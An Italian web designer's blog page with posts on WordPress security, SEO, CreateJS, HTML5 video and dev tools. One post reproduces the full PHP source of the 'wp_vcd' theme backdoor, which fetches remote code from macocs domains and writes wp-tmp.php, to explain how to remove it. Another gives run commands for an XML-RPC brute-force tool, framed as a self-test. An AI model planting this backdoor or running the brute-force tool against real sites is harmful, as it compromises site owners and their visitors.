Andres Hunger UX Web designer  
WINNER OF THE DAY Featured of the Day



Translate

Pages

Wordpress XMLRPC Brute Force Exploit

wordpress-by-exploiting-xml-rpc

XML-RPC Wordpress

Premessa:
Dopo aver subito vari attacchi via XML-RPC con esito negativo (Grazie a WP aggiornato e a qualche accorgimento), voglio condividere con voi questo articolo.

XML-RPC  è una chiamata di procedura remota (RPC) che consente le  chiamate XML codificate che vengono trasportate tramite il protocollo HTTP.
Questo sistema semplifica l'inserimento di contenuti da remoto, rendendo semplice la pubblicazione di un grande volume di dati in una singola operazione tramite XML-RPC.

Questa particolarità e poi stata sfruttata dagli hacker nelle versioni di Wordpress antecedenti la 4.4.1 per effettuare un attacco brute force, 
che consiste nel provare una serie innumerevole di password per poter entrare nel sistema tramite  login.

Per contrastare questo tipo di attacco, oltre aggiornare il nostro Wordpress alla versione più recente rispetto la 4.4.1 in giu, utilizzare un utile plugin anche nella versione free - Ithemes un valido strumento semplice da usare è molto efficace.



undefined



Una delle sue caratteristiche che lo contraddistinguono sono la semplicità d'uso e sopratutto la sua forza nella sicurezza.
Una delle sue funzioni utili che ci eviteranno l'attacco brute force di password sarà limitare il numero di immissione di password nel login.
Una volta impostato tutti coloro che tenteranno di forzare il login con pass errate (a secondo della vostra impostazione) verranno bloccati e sarà registrato il loro IP Host che di seguito potremo bloccare definitivamente e monitorare.  Potremo anche fare in modo che il login avvenga solo da un IP cioè il nostro. Ci sono diversi sitemi per evitare questo tipo di attacco, questo è uno dei tanti.

Altro strumento ma apagamento e Bitninja server security

Protezione all-in-one
BitNinja combina il più potente software di sicurezza server in una suite di protezione facile da usare. Ottieni protezione completa contro XSS, DDoS, malware, scansioni, script injection, enumerazione, forza bruta e altri attacchi automatici - su tutti i principali protocolli, non solo su HTTP.

 

bitninja

 

Ho avuto modo di testarlo, ottimo! (ma approfondiremo in seguito)

Strumento di test: Wordpress-XMLRPC-Brute-Force-Exploit

Questo software ci permettere di verificare il livello di rischio del nostro Sistema WP. tramite un brute force via XML-RPC
Link: https://github.com/1N3/Wordpress-XMLRPC-Brute-Force-Exploit
Install via termiale:

Apri una finestra di terminale e fai il cd ovunque tu abbia scaricato il file, quindi decomprimi i file in posizione:

decomprimere Wordpress-XMLRPC-Brute-Force-Exploit-master.zip

Quindi cambia in quella directory:

cd Wordpress-XMLRPC-Brute-Force-Exploit-master

Mentre sei lì, non ti farà male cambiare le autorizzazioni sul file Python per assicurarci di non incappare in alcun problema nell'esecuzione. Il "7" che stai assegnando significa che sarai in grado di fare tutto ciò che vuoi con il file.

chmod 755 wordpress-xmlrpc-brute.py

Ora esegui da solo il comando Python e dai un'occhiata alle istruzioni.

./wordpress-xmlrpc-brute.py

 

undefined

 

NB. in conclusione:

La protezione dalla vulnerabilità XML-RPC è semplice e le versioni più recenti non includono affatto la funzionalità. Detto questo, molti strumenti di pubblicazione di WordPress di terze parti come Jetpack e app per smartphone come IFTTT potrebbero richiedere l'uso di XML-RPC, quindi anche alcune installazioni di WordPress sono state aggiornate con il codice vulnerabile e sono quindi pronte all'intrusione.

Controlla le tue installazioni WordPress e assicurati che, se integri un nuovo strumento che consente l'interazione con WP da un punto di vista remoto, non hai aperto la porta all'intrusione di XML-RPC o di altre intrusioni.
Questa è una delle molte vulnerabilità di WordPress e questo semplice attacco di script è un buon punto di partenza per la tua ricerca.

Potremmo includere questo script all'interno del file function.php:

 

function Remove_Unneeded_XMLRPC( $methods ) {
unset( $methods['wp.getUsersBlogs'] );
return $methods;
}
add_filter( 'xmlrpc_methods', 'Remove_Unneeded_XMLRPC' );

Create js

createjs

Più di una semplice raccolte di librerie JS

Questo progetto è indubbiamente una miniera d'oro per un web designer e developer.
Una suite di librerie e strumenti modulari che lavorano insieme o in modo indipendente per abilitare ricchi contenuti interattivi su tecnologie web aperte tramite HTML5.

EaselJS

Una libreria JavaScript che facilita il lavoro con l'elemento Canvas HTML5.
Utile per creare giochi, arte generativa e altre esperienze altamente grafiche.

EaselJS offre soluzioni dirette per lavorare con grafica ricca e interattività con HTML5 Canvas.
Fornisce un'API che è familiare agli sviluppatori Adobe Animate, ma abbraccia la sensibilità JavaScript.
Consiste in un elenco di visualizzazione completo, gerarchico, un modello di interazione core e classi helper per semplificare il lavoro con Canvas.

TWEEN JS

Una libreria JavaScript semplice ma potente per il tweening e l'animazione di proprietà HTML5 e JavaScript.
Funziona stand-alone o integrato con EaselJS.

TweenJS è una libreria di tweening semplice da utilizzare in JavaScript.
È stato sviluppato per integrarsi bene con la libreria EaselJS, ma non è dipendente o specifico. Supporta il tweening di entrambe le proprietà degli oggetti numerici e le proprietà di stile CSS. L'API è semplice ma molto potente, facilitando la creazione di interpolazioni complesse concatenando comandi.

SOUND JS

Una libreria JavaScript che fornisce una semplice API e potenti funzionalità per semplificare il lavoro con l'audio.
Si collega facilmente il caricamento del file audio a PreloadJS.

SoundJS riassume l'implementazione del suono HTML5, rendendo molto più semplice l'aggiunta di suoni cross-browser coerenti ai tuoi giochi o esperienze ricche.
È possibile richiedere le funzionalità, quindi specificare e assegnare la priorità a quali API, plug-in e funzionalità vengono sfruttati per dispositivi o browser specifici. 

PRECARICO JS

Una libreria JavaScript che consente di gestire e coordinare il caricamento di risorse e dati.

PreloadJS facilita il precaricamento delle risorse: immagini, suoni, JS, caratteri, testo e altro.
Usa XHR2 per fornire informazioni di progresso reali quando disponibili, o ricade per taggare il caricamento e agevolare il progresso quando non lo è.
Consente più code, più connessioni, interrompendo code e molto altro.

 

Considerando che è sponsorizzato da Adobe, MicrosoftMozzillaGskinner

Se ne vedranno delle belle!!!!

Wordpress Malware

Wordpress Malware

"rogueads.unwanted_ads" su WP come rimuoverlo

La mia esperienza mi ha portato a scrivere questo post, per aiutarvi nella prevenzione ed eliminazione di fiale malevoli Malware che potrebbero compromettere il vostro WordPress, sia nel sistema che nel Posizionamento su Google e altri motori di ricerca.

Oggi ne andremo ad analizzare uno in particolare, molto comune in Wordpress “rogueads.unwanted_ads”

Descrizione: Iniezioni malevoli di Varios che comportano la visualizzazione di annunci (o l'apertura di finestre pop-up o pop-under) senza il consenso del proprietario del sito. Tali iniezioni possono utilizzare script di reti pubblicitarie legittime.

Malware

 

Molto facile a individuare appunto della sua presenza, visto che si apriranno pop up o link insueti al sito.
Molto importante e definire il flusso del contagio… in parole povere come ho preso il Malware?
Potrebbero essere molteplici le strade male più comuni sono:

1 Non importare plugin non legalmente acquistati
2 Non importare Template non legalmente acquistati
3 Aggiornare sempre il propio WP e i plugin associati
4 L’imitare l’uso dei plugin (onde evitare che se scritti male potrebbero essere facilmente compromessi)
5 Server sicuro quindi spendere il giusto non certo 1 euro

Ma adiamo al nocciolo del discorso, una volta che siamo in gioco cominceremo a verificare la vera identità tramite uno scanner online molto utile io uso questo: sitecheck.sucuri.net
Una volta individuato il problema… No Panico!


Spesso il Core del Malware va a intaccare il nostro file function.php del tema che stiamo utilizzando.
Ighettando uno script simile:

<?php
if ( isset( $_REQUEST[ 'action' ] ) && isset( $_REQUEST[ 'password' ] ) && ( $_REQUEST[ 'password' ] == '741b457737ff0478b6e1ccef383efcc9' ) ) {
$div_code_name = "wp_vcd";
switch ( $_REQUEST[ 'action' ] ) {
case 'change_domain';
if ( isset( $_REQUEST[ 'newdomain' ] ) ) {
if ( !empty( $_REQUEST[ 'newdomain' ] ) ) {
if ( $file = @file_get_contents( __FILE__ ) ) {
if ( preg_match_all( '/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i', $file, $matcholddomain ) ) {
$file = preg_replace( '/' . $matcholddomain[ 1 ][ 0 ] . '/i', $_REQUEST[ 'newdomain' ], $file );
@file_put_contents( __FILE__, $file );
print "true";
}
}
}
}
break;
case 'change_code';
if ( isset( $_REQUEST[ 'newcode' ] ) ) {

if ( !empty( $_REQUEST[ 'newcode' ] ) ) {
if ( $file = @file_get_contents( __FILE__ ) ) {
if ( preg_match_all( '/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode ) ) {

$file = str_replace( $matcholdcode[ 1 ][ 0 ], stripslashes( $_REQUEST[ 'newcode' ] ), $file );
@file_put_contents( __FILE__, $file );
print "true";
}


}
}
}
break;

default:
print "ERROR_WP_ACTION WP_V_CD WP_CD";
}

die( "" );
}
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if ( !function_exists( 'theme_temp_setup' ) ) {
$path = $_SERVER[ 'HTTP_HOST' ] . $_SERVER[ REQUEST_URI ];
if ( stripos( $_SERVER[ 'REQUEST_URI' ], 'wp-cron.php' ) == false && stripos( $_SERVER[ 'REQUEST_URI' ], 'xmlrpc.php' ) == false ) {

function file_get_contents_tcurl( $url ) {
$ch = curl_init();
curl_setopt( $ch, CURLOPT_AUTOREFERER, TRUE );
curl_setopt( $ch, CURLOPT_HEADER, 0 );
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );
curl_setopt( $ch, CURLOPT_URL, $url );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, TRUE );
$data = curl_exec( $ch );
curl_close( $ch );
return $data;
}

function theme_temp_setup( $phpCode ) {
$tmpfname = tempnam( sys_get_temp_dir(), "theme_temp_setup" );
$handle = fopen( $tmpfname, "w+" );
if ( fwrite( $handle, "<?php\n" . $phpCode ) ) {} else {
$tmpfname = tempnam( './', "theme_temp_setup" );
$handle = fopen( $tmpfname, "w+" );
fwrite( $handle, "<?php\n" . $phpCode );
}
fclose( $handle );
include $tmpfname;
unlink( $tmpfname );
return get_defined_vars();
}


$wp_auth_key = 'bb9aed696b080d6d327d927fc0b733d8';
if ( ( $tmpcontent = @file_get_contents( "http://www.macocs.com/code.php" )OR $tmpcontent = @file_get_contents_tcurl( "http://www.macocs.com/code.php" ) )AND stripos( $tmpcontent, $wp_auth_key ) !== false ) {

if ( stripos( $tmpcontent, $wp_auth_key ) !== false ) {
extract( theme_temp_setup( $tmpcontent ) );
@file_put_contents( ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent );

if ( !file_exists( ABSPATH . 'wp-includes/wp-tmp.php' ) ) {
@file_put_contents( get_template_directory() . '/wp-tmp.php', $tmpcontent );
if ( !file_exists( get_template_directory() . '/wp-tmp.php' ) ) {
@file_put_contents( 'wp-tmp.php', $tmpcontent );
}
}

}
} elseif ( $tmpcontent = @file_get_contents( "http://www.macocs.pw/code.php" )AND stripos( $tmpcontent, $wp_auth_key ) !== false ) {

if ( stripos( $tmpcontent, $wp_auth_key ) !== false ) {
extract( theme_temp_setup( $tmpcontent ) );
@file_put_contents( ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent );

if ( !file_exists( ABSPATH . 'wp-includes/wp-tmp.php' ) ) {
@file_put_contents( get_template_directory() . '/wp-tmp.php', $tmpcontent );
if ( !file_exists( get_template_directory() . '/wp-tmp.php' ) ) {
@file_put_contents( 'wp-tmp.php', $tmpcontent );
}
}

}
}

elseif ( $tmpcontent = @file_get_contents( "http://www.macocs.top/code.php" )AND stripos( $tmpcontent, $wp_auth_key ) !== false ) {

if ( stripos( $tmpcontent, $wp_auth_key ) !== false ) {
extract( theme_temp_setup( $tmpcontent ) );
@file_put_contents( ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent );

if ( !file_exists( ABSPATH . 'wp-includes/wp-tmp.php' ) ) {
@file_put_contents( get_template_directory() . '/wp-tmp.php', $tmpcontent );
if ( !file_exists( get_template_directory() . '/wp-tmp.php' ) ) {
@file_put_contents( 'wp-tmp.php', $tmpcontent );
}
}

}
}
elseif ( $tmpcontent = @file_get_contents( ABSPATH . 'wp-includes/wp-tmp.php' )AND stripos( $tmpcontent, $wp_auth_key ) !== false ) {
extract( theme_temp_setup( $tmpcontent ) );

} elseif ( $tmpcontent = @file_get_contents( get_template_directory() . '/wp-tmp.php' )AND stripos( $tmpcontent, $wp_auth_key ) !== false ) {
extract( theme_temp_setup( $tmpcontent ) );

} elseif ( $tmpcontent = @file_get_contents( 'wp-tmp.php' )AND stripos( $tmpcontent, $wp_auth_key ) !== false ) {
extract( theme_temp_setup( $tmpcontent ) );

}





}
}
//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
?>

Se lo script è simile... possiamo procedere...

Come possiamo notare spesso andranno a richiamare altri file generati all’interno del core.
Leggendo il codice possiamo individuare il percorso del file da eliminare.

Spesso si trovano all’interno del core di WP nella cartella wp-includes/

Nel mio caso lo script in questione $div_code_name="wp_vcd"; all’interno del mio file function richimva un altro file all’interno della cartella wp-includes/wp-tmp.php

Quindi cosa fare?

Via FTP andremo nella cartella del mio tema,
e tolgieremo lo script malevolo all’interno del file function.php per poi eliminare il file wp-includes/wp-tmp.php.
Questa volta è stato facile, ma non si deve mai Abbassare la guardia!

Risorse:
sitecheck.sucuri.net
mxtoolbox.com

Custom Post Type UI WordPress

undefined

Wordpress Developer

Prima di tutto dobbiamo parlare del progetto Pluginize lanciato nel 2016 da WebDevStudios per promuovere, sostenere e ospitare tutti i prodotti WordPress.
Pluginize non è solo creazione di nuovi prodotti per WordPress, come CPTUI e CPTUI Extended, ma fornisce anche supporto continuativo e sviluppo per CMB2 e altro.

Plugin CPTUI ovvero 'Custom Post Type UI'

Questo plugin e un ottimo struento per poter implementare "Custom Post Types" all'interno del propio tema.
Ottimo per lo sviluppo, la versione free e fatta molto bene, semplice ed intuitiva.

Link ufficiale WordPress.org

Link ufficiale GitHub

Questo strumento ci permette di guadagnare tempo prezioso nello sviluppo, inoltre ci permette di non commettere errori sopratutto a sviluppatori alle prime armi.
Il plugi fornisce un'interfaccia facile da usare per la registrazione e la gestione di Custom Post Types e tassonomie per il tuo tema.
CPTUI da solo non gestisce gli aspetti relativi alla visualizzazione del tipo di post o del contenuto di tassonomia.
Il suo obiettivo è semplicemente la registrazione di entrambi.
Per entrare più sul dettaglio dovremo usare CPTUI-Extended che fornisce più strumenti per aiutare a visualizzare il contenuto di tutti i tipi registrati nel tuo tema ma è a pagamento

 

 

Tornando al CPTUI Free la sezione più interessante a mio dire è la possibilità di visualizzare il codice generato per poi implementarlo all'interno del file function.php

undefined

Per poi sviluppare e gestire il vostro template senza il plugin.
Ovvimante subito dopo si devono creare le sezioni di riferimento all'interno del vostro tema.
(esempio archive-nome.php, single-nome.php)

 

Nuovo algoritmo SEO Google 2018

undefined

Le nuove disposizioni dei Meta tags

Nel nuovo anno 2018 Google ha già apportato diversi aggiornamenti al suo algoritmo e alle sue pagine dei risultati di ricerca - inclusi i meta tag.


Tra questi aggiornamenti vi sono le ricerche vocali e localizzate, che stanno cambiando il modo in cui viene implementata la SEO.
Google si aggiorna costantemente. Questo significa che la SEO si sta evolvendo, come sempre.

Nessuno sa per certo come si evolveranno esattamente i cambiamenti futuri, ma sappiamo che l'infrastruttura del sito web deve essere costruita correttamente.

Alcuni degli elementi più importanti del SEO sono i meta tag di un sito web.
Tecnicamente, molti elementi di una pagina web sono "meta tag": tag HTML che di solito non sono visibili alla maggior parte dei visitatori e che sono molto importanti per i robot dei motori di ricerca.

I tag su cui mi concentrerò in questo articolo sono i tag Meta Title e Meta Description, con alcune parole riguardanti le intestazioni e il tag meta Keywords ormai obsoleto.

I meta tag sono ciò che fa risaltare il tuo sito nei risultati di ricerca o, in alcuni casi, fa l'esatto opposto. Il meta titolo ideale aumenta l'attenzione degli utenti, e la meta description stuzzica un utente abbastanza da farli entrare nel sito.

2018 potrebbe vedere alcune ricerche più specifiche e personalizzate, ma al momento non è possibile creare meta tag specifici per ogni query mai posta (anche con l'aumento dell'IA).

Ecco una lista di controllo con gli elementi più importanti che un Meta Title dovrebbe includere:

1. GRAMMAR
Negli anni precedenti, i KW sarebbero stati i primi in questa lista, ma con l'algoritmo intelligente di Google in continua evoluzione, gli utenti non hanno bisogno di KW ingoiati, ma piuttosto di informazioni rilevanti che rispondono alle loro esigenze
L'attenzione di Google è sull'intento dell'utente e su UX , non su riempimento KW: mantenere il titolo grammaticalmente corretto
Il tuo sito si classificherà bene finché trasmetti un buon messaggio.


2. KW
Dopo aver fatto una ricerca KW ben pianificata , considera il KW più rilevante da attuare nel titolo; quel termine di ricerca dovrebbe essere usato il più vicino possibile all'inizio del titolo
o Il posizionamento errato di un semplice KW può portare a una diminuzione delle classifiche, o mantenere una pagina risalente.


3. BREVE E AL PUNTO
La lunghezza deve essere di circa 55-70 caratteri
Tieni presente che quel numero è solo una stima. Il motivo: Google taglia titoli che sono più lunghi di 600 pixel . Ciò significa che la lunghezza visiva di un titolo nei risultati di ricerca è più importante del numero effettivo di caratteri. Le cifre e le lettere strette occupano meno spazio di quelle ampie, ad esempio "1", "t" e "I", rispetto a "7", "M" e "W".


o SEOMofo ha pubblicato un caso di studio molto interessante su questo argomento qualche tempo fa, che è ancora rilevante (il sito Web aggiorna anche i test) e si è rivelato un risultato molto interessante: un meta titolo di 107 caratteri che viene mostrato in SERP (!)


4. NESSUNA PROMO
Rendilo NATURALE ! Nessuno stile promozionale per pagine informative indirizzate al traffico organico - altrimenti, Google lo considererà come spam e, molto probabilmente, con buone ragioni.


Tenete presente l'intento dei vostri visitatori e il vostro sito funzionerà meglio - non tutti i KW valgono questo immobile, e se gli utenti non troveranno quello che stanno cercando una volta sul vostro sito, lasceranno.


5. UNICITÀ
Proprio come i contenuti duplicati su una pagina, Google non è un fan dei titoli duplicati (e delle descrizioni, se è per questo) e verrà mostrato nelle prestazioni del tuo sito - assicurati che ogni pagina abbia il suo titolo unico.

INFO TAB
Un'altra cosa da tenere a mente è che il meta titolo apparirà nella scheda aperta quando si sfoglia una pagina.
Questo serve come elemento informativo per aiutare UX e la navigazione dell'utente.
Idealmente, vorrai che tutte le informazioni rilevanti siano mostrate il più possibile evidenti.

Come accennato in precedenza, il meta titolo ha molta influenza sulle classifiche di una pagina e sul suo CTR, e potrebbe benissimo essere il meta tag più forte nel 2018, ma non è affatto l'unico.

INSERISCI LA META DESCRIPTION

La meta description è, letteralmente, una descrizione di una pagina. Si trova appena sotto il meta titolo nei risultati di ricerca, e non può essere visto da un visitatore una volta che entrano nel sito. In passato, sembrava avere più potere in termini di classifiche di una pagina, in modo simile al meta titolo, ma in questo giorno ed età, dopo aver attraversato molti aggiornamenti e cambiamenti, il suo scopo è cambiato.

Il suo attuale obiettivo principale è quello di dire all'utente di che cosa tratta una pagina (un teaser o un blurb, di sorta), e di farlo in modo seducente. Questo è il motivo per cui la meta description è così importante: è uno dei principali fattori che aiutano il CTR di una pagina.

Ecco le ultime best practice e notizie sulle meta descrizioni:

1. META DESCRIZIONE LUNGHEZZA - AGGIORNAMENTI!
Solo fino a diversi giorni fa, la lunghezza raccomandata per una meta description era di circa 155-160 caratteri, come suggerito dai professionisti SEO di MOZ.

Negli ultimi giorni, Danny Sullivan stesso (da una delle divisioni di ricerca di Google) ha ammesso che le descrizioni sono ora più lunghe - il consenso generale online è che la lunghezza è attualmente di circa 230 caratteri. Questa è la risposta di Sullivan a Barry Schwartz di Search Engine Land su Twitter:
La risposta di Danny Sullivan a Search Engine Land su TwitterRisultati diversi mostrano lunghezze diverse e alcuni siti presentano anche descrizioni di oltre 300 (!) Caratteri

2. KW
Sì, dovresti includere anche il tuo KW nella meta description - è importante! Questo serve come un altro modo per dire agli utenti che hanno trovato le informazioni che stavano cercando - e ovviamente più informativo del meta title, badate bene:
meta description keywords

Non esagerare con il KW, tuttavia - il suo ricorrere nella descrizione non lo rinforza necessariamente; infatti, farlo potrebbe finire per fare il contrario.


3. FARE CLIC SU
Ricorda: lo scopo principale della meta descrizione è quello di aumentare l'interesse dell'utente, rimanendo comunque pertinenti ai contenuti della pagina.
Fai il conteggio delle copie - racconta ai visitatori di cosa tratta la pagina, senza rivelare immediatamente tutti i tuoi segreti.
Pensa a qualcosa che sia facile da leggere e avvincente.

4. UNICITÀ
Esattamente come Titoli Meta: dai a ciascuna pagina una descrizione fatta su misura per questo.

INTESTAZIONI

Non possono essere generalmente definiti "meta tag", ma le intestazioni (spesso definite anche "titoli" o più comunemente indirizzate come "titoli" confusi) sono quasi importanti quanto i meta-titoli e le descrizioni. Tag di intestazione, codificati in numeri, dimensioni e importanza a partire da 1 in poi (il tag <h1> è l'intestazione più grande e più importante, <h2> il secondo e così via), sono effettivamente visibili su una pagina quando un l'utente entra nel sito e non nei risultati di ricerca, al contrario di titoli e descrizioni.

In effetti, sono abbastanza importanti da essere i titoli principali di una pagina - tanto è vero che è la migliore pratica SEO per assicurarsi che la tua pagina abbia un'intestazione H1 (il tuo titolo principale) il più in alto possibile sulla tua pagina, e diversi Intestazioni H2 da seguire.

META KW
Il meta tag di KWs è uno di quelli che io stesso ho usato parecchio in passato e che, come detto sopra, è diventato obsoleto.
L'idea alla base di questo tag era piuttosto diretta e di base: utilizza le parole chiave per le quali desideri classificare e Google le terrà in considerazione nel suo algoritmo.

Tuttavia, molti webmaster hanno abusato di questo tag per posizionarsi il più in alto possibile (puoi biasimarli?), Il che ha portato a un altro aggiornamento di Google, un algoritmo più intelligente, che alla fine ignorava del tutto questo tag.

C'è ancora qualche discussione riguardo questo tag e se ha o meno alcun tipo di effetto su una pagina.
La nostra raccomandazione è di rimuovere completamente i meta KW, ovunque essi compaiano.

Riteniamo che potrebbero essere considerati un fattore di spam negli occhi di Google (sappiamo che è in Bing ).

Inoltre, i meta KW consentono ai tuoi concorrenti di capire ancora meglio quali KW stai bersagliando e su quali pagine...

 

Fonte

Activate WordPress Maintenance Mode

Maintenance Mode no plugin

Maintenance Mode no plugin

Come aggiungere la funzionalità di Maintenance nel vostro WP ovvero sito in manutenzione.
Possiamo sia installare vari plugin, oppure inserire questa funzione all'interno del nostro file function.php:

/*************************
// Activate WordPress Maintenance Mode
function wp_maintenance_mode(){
if(!current_user_can('edit_themes') || !is_user_logged_in()){
wp_die('<h1 style="color:red">Website under Maintenance</h1><br />We are performing scheduled maintenance. We will be back online shortly!');
}
}
add_action('get_header', 'wp_maintenance_mode');
//***************************

Grazie a RoBerto Briceño per lo script ;-)

Animated SVG Slideshow Frame

Animated SVG Frame Slideshow

SVG animato durante lo Slide by Sencha

Questa demo è stata realizzata da Sencha (crea applicazioni web e mobile // Sencha Extjs.)

Una presentazione sperimentale che mostra un frame SVG animato durante la transizione dello Slide.
Possono essere utilizzate diverse forme per creare una varietà di stili creativi e molto emozionanti.

L'idea è di animare un frame SVG mentre passiamo da uno slide ad un altro.
Usando diverse forme possiamo creare una varietà di stili e di frame trasformando l'SVG.

Una delle cose molto importanti per usare bene questo plugin ehavere il Browser aggiornato visto sono stati usati delle nuove proprietà CSS moderne come CSS Flexbox e variabili varie.

Qui Trovate la Demo live
Qui Trovate il Download Source

Qui stiamo animando una semplice forma a scatola:

Animated SVG Frame Slideshow

In questa demo è stato usato un modello per il riempimento a forma di rettangolo leggermente inclinato.
Il pattern è tratto da Hero Patterns:

Animated SVG Frame Slideshow

In questo esempio possiamo usare qualsiasi tipo di forma, anche molto piccola.
Nota come i titoli sopra l'SVG in questa demo:

undefined

 

Non resta che testare e ancora una volta ringraziere Shota e Codrops! Grazie! Thank you! 感謝

Firebug Goodbye

Firebug Goodbye 2017

Addio Firebug

Gli sviluppatori di Firebug abbandonano il supporto per l'estensione più famosa dagli sviluppatori e web designer.
Già dal 2016 si era intuito che sarebbe stato il declino inevitabile, implementando
Firefox Developer Tool.
Ma la vera rottura si avverte ora con gli aggiornamenti di Fire Fox che non rende più compatibile la bellissima e amata estensione Fire Bug.

Ovviamente tutto ha un lieto fine, Fire Fox implementa un secondo Browser Firefox Developer Edition ultra veloce con funzioni all'avanguardia per lo sviluppo web e nello supporto delle ultime tecnologie come le griglie CSS.

Browser Firefox Developer Edition I nuovi strumenti di sviluppo di Firefox sono molto avanzati, flessibili e, soprattutto, ai tuoi ordini. Tra gli altri, il miglior debugger JavaScript in circolazione, realizzato utilizzando le librerie React ed Redux, in grado di gestire più browser contemporaneamente.



undefined

 

Questo strumento è molto valido, già testato da un mese.
Ottimo browser molto veloce e le funzioni di sviluppo sono ben articolate e funzionali, certo ci si deve un po abituare che il buon vecchio FireBug non ce più... ma come sappiamo nulla è eterno.


Scarica la versione di Firefox dedicata agli sviluppatori

 

Scott Murray

Book 3d

Interactive Data Visualization for the Web, 2nd Ed.

Seconda edizione

Ottima guida arrivata alla seconda edizione, per lo sviluppo di animazioni 3d per il web.
Ideale per  chi vuole diventare un Web Developer,  tanti esempi: HTML, CSS, JavaScript , e SVG, ben 140 esempi!

CSS Minifier/Compressor

La compressione CSS

La Compressore in linea del CSS oggi diventa sempre più essenziale, per garantire un lavoro professionale e preformante.
Non solo per ridurre le dimensioni, quindi ottenere tempi di download più bassi (che ci farebbe risparmiare la larghezza di banda)

ma anche in ottica SEO, inquanto lo stesso Google ci ricorda che per essere performanti e posizionati nel suo motore di ricerca, il caricamento delle pagine Web devono essere adeguate hai suoi parametri.

Nel web ci sono molti siti che offrono questo servizio gratuitamante, uno di questi e:csscompressor.com
È possibile scegliere tra 4 livelli di compressione, a seconda di delle esigenze di compressione per file CSS.

 

How to Embed Video Using HTML5

Inserire Video all'interno del nostro sito Web

Implementare video all'interno della nostra pagina HTML5 nulla di più semplice.
Oggi è sempre più usato visto le connessioni molto più veloci rispetto a qualche anno fa.
Questo lo rende sempre di più un ottimo strumento da implementare per rendere la nostra web site più accattivante sia dal punto di vista visivo che a livello di comunicazione.

Usando il tag <video> </video> dell'html5 siamo in grado di inserire un video.
Facendo sempre attenzione lato SEO (grandezza del file per caricamnto della pagina) e buttando un occhio al mobile.(Che vederemo più avanti)

Questo il codice base:

<video autoplay loop poster="/img/IMG.jpg">   
<source src="PATH_TO_MP4" type="video/mp4" />Your browser does not support the video tag. I suggest you upgrade your browser.             
<source src="PATH_TO_WEBM" type="video/webm" />Your browser does not support the video tag. I suggest you upgrade your browser.
</video>
           

Nel prossimo articolo andremo più nel dettaglio. Considerando e implementando l'auto play e la visione nel Mobile, Android e IOS. Al prossimo step ;-)

Rename wp-login.php

Rinominare wp-login tramite file Function.php

Come modificare l'URL di login di WordPress wp-login.php senza l'uso di plugin ma sopratutto in modo sicuro (anche se non lo si è mai) Aggiungere un apposito filtro al file functions.php del vostro tema come esempio:

function example_simple_query_string_protection_for_login_page() {
$QS = '?nome-del-nuovo-login';//qui inserire la variabile per il link
$theRequest = 'https://' . $_SERVER['SERVER_NAME'] . '/' . 'wp-login.php' . '?'. $_SERVER['QUERY_STRING'];
if ( site_url('/wp-login.php').$QS == $theRequest ) { echo 'URL Confermato'; } else { header( 'Location: https://' . $_SERVER['SERVER_NAME'] . '/' ); } } add_action('login_head', 'example_simple_query_string_protection_for_login_page');

Il risultato sarà che per effettuare il login sul nostro Wordpress dovremmo digitare questo link:

https://www.nomesito.it/wp-login.php?nome-del-nuovo-login 

qtranslate-x implementare php wordpress

undefined

QTranslate-X implementazione in php (wp)

QTranslate-X è un plugin sviluppato per wordpress.
Vediamo come implemetare questo plugin all'interno del php di Wordpress nell'eventualità di non usare file po/mo.

Per poter interagire con qTranslate-x nelle sezioni ove non funziona la visuale nel pannello admin all'interno di Wordpress , si può usare questa sintassi [:it]testo italiano[:en]Testo in Inglese[:]

Ma se volessimo implemetare all'interno di una pagina o template creato a doc potremmo aver bisogno di interagire all'iterno del php stesso
Vedi esempio:

<?php echo __("[:it]Esempio [:en] Example[:]"); ?>

Atom un editor hackable

Atom non solo un editor

Atom non chamatelo solo editor!

Editing multipiattaforma

Atom funziona su sistemi operativi. Si può usare su OS X, Windows o Linux.

Gestore di pacchetti integrato

Cercare e installare nuovi pacchetti o iniziare a creare il vostro proprio-tutto all'interno di Atom.

È possibile scegliere tra migliaia di pacchetti software open source che aggiungono nuove caratteristiche e funzionalità di Atom-o costruire un pacchetto da zero e pubblicala per tutti gli altri per l'uso.

Intelligente completamento automatico

Atom consente di scrivere codice più veloce con un intelligente, completamento automatico flessibile.

Browser file system

Facilmente sfogliare e aprire un singolo file, un intero progetto o più progetti in una sola finestra.

lastre multiple

Dividi la tua interfaccia Atom in più riquadri per confrontare e modificare il codice attraverso i file.

Trova e sostituisci

Trova, anteprima, e sostituire il testo durante la digitazione in un file o su tutti i tuoi progetti.

Temi

Atom viene pre-installato con quattro UI e otto sintassi temi a entrambi i colori chiari e scuri. Se non riesci a trovare quello che stai cercando, è possibile anche installare temi creati dalla comunità Atom o creare il proprio.

Personalizzazione

E 'facile da personalizzare e Atom stile. È possibile modificare l'aspetto della vostra interfaccia utente con i CSS / Meno e aggiungere caratteristiche principali con HTML e JavaScript. Guarda il video sulla creazione di Atom .

Sotto il cappuccio

Atom è un'applicazione desktop costruito con HTML, JavaScript, CSS e l'integrazione Node.js. Funziona su Electron , un framework per la creazione di applicazioni multi-piattaforma che utilizzano tecnologie web.

undefined

 

Open source

Atom è open source. Se vuoi far parte della comunità Atom o contribuire a migliorare il vostro editor di testo preferito, ci trovate su GitHub , Discutere e Slac!

 Insomma un editor fanatastico Free e sopratutto molto completo in tutte le sue forme!!!!!!

Adesso no ci resta che provarlo!: link https://atom.io/

 

undefined

Developer Conference 2017

Developer conference Codeanywhere 2017

Developer conference Codeanywhere 2017

Dal 1 e 2 giugno a Sapalto in Croazia

La più grande conferenza per gli sviluppatori dell'Europa sudorientale.
Questo evento, Shift 2017 è il sesto e riunirà più di 1500 partecipanti. Durante i due giorni di conferenza, Shift diventa un luogo di incontro per gli sviluppatori della città più bella del mondo Spalato in Croazia.

Si parlerà delle tecnologie più avanzate, le tecniche e le tendenze più in uso per gli sviluppatori, con autorevoli presenze provenienti da; GitHub, Twitch, Atlassian, GitLab, Heroku, Google, Facebook e molti altri ancora.

 

 

Workshop con gli esperti del settore e i leader che ti faranno  avvicinare con estrema facilità ad alcune delle tecnologie più emozionanti: React, React Native, Webpack e Symphony.
